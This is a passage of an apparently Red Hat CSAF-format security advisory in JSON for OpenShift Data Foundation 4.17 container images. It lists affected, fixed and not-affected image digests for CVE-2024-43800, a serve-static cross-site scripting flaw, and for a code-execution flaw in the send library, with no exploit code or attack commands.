"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
